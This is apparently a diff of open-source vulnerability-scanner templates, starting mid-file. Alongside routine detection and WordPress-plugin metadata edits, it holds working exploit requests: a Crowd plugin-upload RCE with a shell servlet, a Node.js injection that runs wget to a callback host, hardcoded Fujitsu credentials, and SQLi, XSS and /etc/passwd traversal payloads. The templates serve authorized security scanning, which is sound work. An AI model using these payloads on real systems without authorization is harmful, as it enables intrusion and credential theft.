f6d2f63646c2f7368656c6c2f6578702e6a617661555405000330e4f66475780b000104e803000004e8030000504b05060000000006000600ff010000c80400000000")}}'
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
|
POST /crowd/admin/uploadplugin.action HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7
|
||||||
|
Expect: 100-continue
|
||||||
|
|
||||||
|
------------------------------f15fe87e95a7
|
||||||
|
Content-Disposition: form-data; name="file_cdl"; filename="rce.jar"
|
||||||
|
Content-Type: application/octet-stream
|
||||||
|
|
||||||
|
{{plugin}}
|
||||||
|
------------------------------f15fe87e95a7--
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /crowd/plugins/servlet/exp HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body_2
|
||||||
words:
|
words:
|
||||||
- "root:*:"
|
- "CVE-2019-11580"
|
||||||
- "bin:*:"
|
|
||||||
condition: and
|
|
||||||
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
|
@ -39,6 +39,8 @@ http:
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- "<svg/onload=alert(document.domain)>"
|
- "<svg/onload=alert(document.domain)>"
|
||||||
|
- "<strong>IceWarp"
|
||||||
|
condition: and
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -33,6 +33,7 @@ http:
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//'
|
- '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
|
|
|
@ -0,0 +1,50 @@
|
||||||
|
id: CVE-2023-38433
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Fujitsu IP Series - Hardcoded Credentials
|
||||||
|
author: AdnaneKhan
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices.
|
||||||
|
reference:
|
||||||
|
- https://www.praetorian.com/blog/fujitsu-ip-series-hard-coded-credentials
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-38433
|
||||||
|
- https://www.cisa.gov/news-events/ics-advisories/icsa-23-248-01
|
||||||
|
- https://www.fujitsu.com/global/products/computing/peripheral/video/download
|
||||||
|
- https://jvn.jp/en/jp/JVN95727578
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||||
|
cvss-score: 7.5
|
||||||
|
cwe-id: CWE-798
|
||||||
|
metadata:
|
||||||
|
max-req: 1
|
||||||
|
max-request: 2
|
||||||
|
shodan-query: '"Server: thttpd/2.25b 29dec2003" content-length:1133'
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,fujitsu,ip-series
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /b_download/index.html HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Authorization: Basic {{base64(username + ':' + password)}}
|
||||||
|
|
||||||
|
attack: pitchfork
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- fedish264pro
|
||||||
|
- fedish265pro
|
||||||
|
password:
|
||||||
|
- h264pro@broadsight
|
||||||
|
- h265pro@broadsight
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'Field Support'
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,36 @@
|
||||||
|
id: CVE-2023-39361
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cacti 1.2.24 - SQL Injection
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
|
||||||
|
reference:
|
||||||
|
- https://github.com/Cacti/cacti/security/advisories/GHSA-6r43-q2fw-5wrg
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-39361
|
||||||
|
classification:
|
||||||
|
cve-id: CVE-2023-39361
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cwe-id: CWE-89
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
shodan-query: title:"Login to Cacti"
|
||||||
|
tags: cve,cve2023,cacti,sqli
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
GET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration>=10'
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains_all(body, "Tree Mode", "cacti")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,47 @@
|
||||||
|
id: CVE-2023-39600
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: IceWarp 11.4.6.0 - Cross-Site Scripting
|
||||||
|
author: Imjust0
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
|
||||||
|
reference:
|
||||||
|
- https://medium.com/@katikitala.sushmitha078/cross-site-scripting-reflected-xss-in-icewarp-server-cve-2023-39600-310a7e1c8817
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-39600
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.1
|
||||||
|
cve-id: CVE-2023-39600
|
||||||
|
cwe-id: CWE-79
|
||||||
|
epss-score: 0.0046
|
||||||
|
cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:*
|
||||||
|
epss-percentile: 0.72232
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
shodan-query: title:"icewarp"
|
||||||
|
vendor: icewarp
|
||||||
|
product: icewarp_server
|
||||||
|
tags: cve,cve2023,icewarp,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/webmail/?color="><img src=x onerror=confirm(document.domain)>'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<img src=x onerror=confirm(document.domain)>"
|
||||||
|
- "IceWarp"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,35 @@
|
||||||
|
id: dxplanning-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: DXPlanning Panel - Detect
|
||||||
|
author: righettod
|
||||||
|
severity: info
|
||||||
|
description: |
|
||||||
|
DXPlanning was detected.
|
||||||
|
reference:
|
||||||
|
- https://www.dedalus.com/fr/wp-content/uploads/sites/13/2022/05/Catalogue-formations-DxCare-2022.pdf
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
tags: panel,dxplanning,login,detect
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/DxPlanning/WebBooking/Version'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "contains(tolower(body), 'dxplanning/webbooking/')"
|
||||||
|
- "contains(body, 'Webbooking</title>')"
|
||||||
|
- "status_code==200"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '<td>([0-9.]+)</td>'
|
|
@ -0,0 +1,47 @@
|
||||||
|
id: seafile-api
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Seafile API - Detect
|
||||||
|
author: righettod
|
||||||
|
severity: info
|
||||||
|
description: |
|
||||||
|
Seafile API was detected.
|
||||||
|
reference:
|
||||||
|
- https://download.seafile.com/published/web-api/home.md
|
||||||
|
- https://manual.seafile.com/
|
||||||
|
- https://www.seafile.com/en/home/
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.html:"seafile"
|
||||||
|
tags: exposure,api,detect
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/api2/server-info/'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'seafile-basic'
|
||||||
|
- 'seafile-pro'
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- 'application/json'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '"version":\s*"([0-9.]+)"'
|
|
@ -2,7 +2,7 @@ id: shopify-takeover
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: shopify takeover detection
|
name: shopify takeover detection
|
||||||
author: pdteam,philippedelteil
|
author: pdteam,philippedelteil,Imjust0
|
||||||
severity: high
|
severity: high
|
||||||
reference:
|
reference:
|
||||||
- https://medium.com/@thebuckhacker/how-to-do-55-000-subdomain-takeover-in-a-blink-of-an-eye-a94954c3fc75
|
- https://medium.com/@thebuckhacker/how-to-do-55-000-subdomain-takeover-in-a-blink-of-an-eye-a94954c3fc75
|
||||||
|
@ -28,6 +28,7 @@ http:
|
||||||
words:
|
words:
|
||||||
- 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"'
|
- 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"'
|
||||||
- "Sorry, this shop is currently unavailable."
|
- "Sorry, this shop is currently unavailable."
|
||||||
|
- "Sorry, this store is currently unavailable."
|
||||||
condition: or
|
condition: or
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
|
|
@ -0,0 +1,42 @@
|
||||||
|
id: burp-collaborator-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Burp Collaborator Server - Detect
|
||||||
|
author: lum8rjack
|
||||||
|
severity: info
|
||||||
|
description: |
|
||||||
|
Burp Collaborator server detected.
|
||||||
|
reference:
|
||||||
|
- https://portswigger.net/burp/documentation/collaborator
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||||
|
cvss-score: 0.0
|
||||||
|
cwe-id: CWE-200
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
shodan-query: "Server: Burp Collaborator"
|
||||||
|
tags: burp,tech,detect
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "Server: Burp Collaborator https://burpcollaborator.net/"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: header
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- "(?:X-(Collaborator-Version: [0-9]))"
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: honeypot-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Honeypot Detection
|
||||||
|
author: j4vaovo
|
||||||
|
severity: info
|
||||||
|
description: |
|
||||||
|
Honeypot was Detected.
|
||||||
|
reference:
|
||||||
|
- https://github.com/zema1/yarx
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
tags: honeypot,tech,cti
|
||||||
|
|
||||||
|
variables:
|
||||||
|
rand1: "{{randstr}}"
|
||||||
|
rand2: "{{rand_int(11111, 99999)}}"
|
||||||
|
rand3: "{{randstr}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/?{{rand1}}=../../../../../../../../etc/passwd&{{rand3}}=1%20and%20updatexml(1,concat(0x7e,(select%20md5({{rand2}}))),1)"
|
||||||
|
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '{{md5({{rand2}})}}'
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/ad-inserter/
|
- https://wordpress.org/plugins/ad-inserter/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: ad-inserter
|
plugin_namespace: ad-inserter
|
||||||
wpscan: https://wpscan.com/plugin/ad-inserter
|
wpscan: https://wpscan.com/plugin/ad-inserter
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/add-to-any/
|
- https://wordpress.org/plugins/add-to-any/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: add-to-any
|
plugin_namespace: add-to-any
|
||||||
wpscan: https://wpscan.com/plugin/add-to-any
|
wpscan: https://wpscan.com/plugin/add-to-any
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/admin-menu-editor/
|
- https://wordpress.org/plugins/admin-menu-editor/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: admin-menu-editor
|
plugin_namespace: admin-menu-editor
|
||||||
wpscan: https://wpscan.com/plugin/admin-menu-editor
|
wpscan: https://wpscan.com/plugin/admin-menu-editor
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/advanced-custom-fields/
|
- https://wordpress.org/plugins/advanced-custom-fields/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: advanced-custom-fields
|
plugin_namespace: advanced-custom-fields
|
||||||
wpscan: https://wpscan.com/plugin/advanced-custom-fields
|
wpscan: https://wpscan.com/plugin/advanced-custom-fields
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/akismet/
|
- https://wordpress.org/plugins/akismet/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: akismet
|
plugin_namespace: akismet
|
||||||
wpscan: https://wpscan.com/plugin/akismet
|
wpscan: https://wpscan.com/plugin/akismet
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/all-404-redirect-to-homepage/
|
- https://wordpress.org/plugins/all-404-redirect-to-homepage/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: all-404-redirect-to-homepage
|
plugin_namespace: all-404-redirect-to-homepage
|
||||||
wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
|
wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/all-in-one-seo-pack/
|
- https://wordpress.org/plugins/all-in-one-seo-pack/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: all-in-one-seo-pack
|
plugin_namespace: all-in-one-seo-pack
|
||||||
wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
|
wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/all-in-one-wp-migration/
|
- https://wordpress.org/plugins/all-in-one-wp-migration/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: all-in-one-wp-migration
|
plugin_namespace: all-in-one-wp-migration
|
||||||
wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
|
wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
|
- https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: all-in-one-wp-security-and-firewall
|
plugin_namespace: all-in-one-wp-security-and-firewall
|
||||||
wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
|
wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/amp/
|
- https://wordpress.org/plugins/amp/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: amp
|
plugin_namespace: amp
|
||||||
wpscan: https://wpscan.com/plugin/amp
|
wpscan: https://wpscan.com/plugin/amp
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/antispam-bee/
|
- https://wordpress.org/plugins/antispam-bee/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: antispam-bee
|
plugin_namespace: antispam-bee
|
||||||
wpscan: https://wpscan.com/plugin/antispam-bee
|
wpscan: https://wpscan.com/plugin/antispam-bee
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/astra-sites/
|
- https://wordpress.org/plugins/astra-sites/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: astra-sites
|
plugin_namespace: astra-sites
|
||||||
wpscan: https://wpscan.com/plugin/astra-sites
|
wpscan: https://wpscan.com/plugin/astra-sites
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/astra-widgets/
|
- https://wordpress.org/plugins/astra-widgets/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: astra-widgets
|
plugin_namespace: astra-widgets
|
||||||
wpscan: https://wpscan.com/plugin/astra-widgets
|
wpscan: https://wpscan.com/plugin/astra-widgets
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/autoptimize/
|
- https://wordpress.org/plugins/autoptimize/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: autoptimize
|
plugin_namespace: autoptimize
|
||||||
wpscan: https://wpscan.com/plugin/autoptimize
|
wpscan: https://wpscan.com/plugin/autoptimize
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/backwpup/
|
- https://wordpress.org/plugins/backwpup/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: backwpup
|
plugin_namespace: backwpup
|
||||||
wpscan: https://wpscan.com/plugin/backwpup
|
wpscan: https://wpscan.com/plugin/backwpup
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/better-search-replace/
|
- https://wordpress.org/plugins/better-search-replace/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: better-search-replace
|
plugin_namespace: better-search-replace
|
||||||
wpscan: https://wpscan.com/plugin/better-search-replace
|
wpscan: https://wpscan.com/plugin/better-search-replace
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/better-wp-security/
|
- https://wordpress.org/plugins/better-wp-security/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: better-wp-security
|
plugin_namespace: better-wp-security
|
||||||
wpscan: https://wpscan.com/plugin/better-wp-security
|
wpscan: https://wpscan.com/plugin/better-wp-security
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/black-studio-tinymce-widget/
|
- https://wordpress.org/plugins/black-studio-tinymce-widget/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: black-studio-tinymce-widget
|
plugin_namespace: black-studio-tinymce-widget
|
||||||
wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
|
wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/breadcrumb-navxt/
|
- https://wordpress.org/plugins/breadcrumb-navxt/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: breadcrumb-navxt
|
plugin_namespace: breadcrumb-navxt
|
||||||
wpscan: https://wpscan.com/plugin/breadcrumb-navxt
|
wpscan: https://wpscan.com/plugin/breadcrumb-navxt
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/breeze/
|
- https://wordpress.org/plugins/breeze/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: breeze
|
plugin_namespace: breeze
|
||||||
wpscan: https://wpscan.com/plugin/breeze
|
wpscan: https://wpscan.com/plugin/breeze
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/broken-link-checker/
|
- https://wordpress.org/plugins/broken-link-checker/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: broken-link-checker
|
plugin_namespace: broken-link-checker
|
||||||
wpscan: https://wpscan.com/plugin/broken-link-checker
|
wpscan: https://wpscan.com/plugin/broken-link-checker
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/child-theme-configurator/
|
- https://wordpress.org/plugins/child-theme-configurator/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: child-theme-configurator
|
plugin_namespace: child-theme-configurator
|
||||||
wpscan: https://wpscan.com/plugin/child-theme-configurator
|
wpscan: https://wpscan.com/plugin/child-theme-configurator
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/classic-editor/
|
- https://wordpress.org/plugins/classic-editor/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: classic-editor
|
plugin_namespace: classic-editor
|
||||||
wpscan: https://wpscan.com/plugin/classic-editor
|
wpscan: https://wpscan.com/plugin/classic-editor
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/classic-widgets/
|
- https://wordpress.org/plugins/classic-widgets/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: classic-widgets
|
plugin_namespace: classic-widgets
|
||||||
wpscan: https://wpscan.com/plugin/classic-widgets
|
wpscan: https://wpscan.com/plugin/classic-widgets
|
||||||
tags: tech,wordpress,wp-plugin,top-100,top-200
|
tags: tech,wordpress,wp-plugin,top-100,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/click-to-chat-for-whatsapp/
|
- https://wordpress.org/plugins/click-to-chat-for-whatsapp/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: click-to-chat-for-whatsapp
|
plugin_namespace: click-to-chat-for-whatsapp
|
||||||
wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
|
wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
|
||||||
tags: tech,wordpress,wp-plugin,top-200
|
tags: tech,wordpress,wp-plugin,top-200
|
||||||
|
|
|
@ -7,7 +7,6 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://wordpress.org/plugins/cmb2/
|
- https://wordpress.org/plugins/cmb2/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
|
||||||
plugin_namespace: cmb2
|
plugin_namespace: cmb2
|
||||||
wpscan: https://wpscan.com/plugin/cmb2
|
wpscan: https://wpscan.com/plugin/cmb2
|
||||||
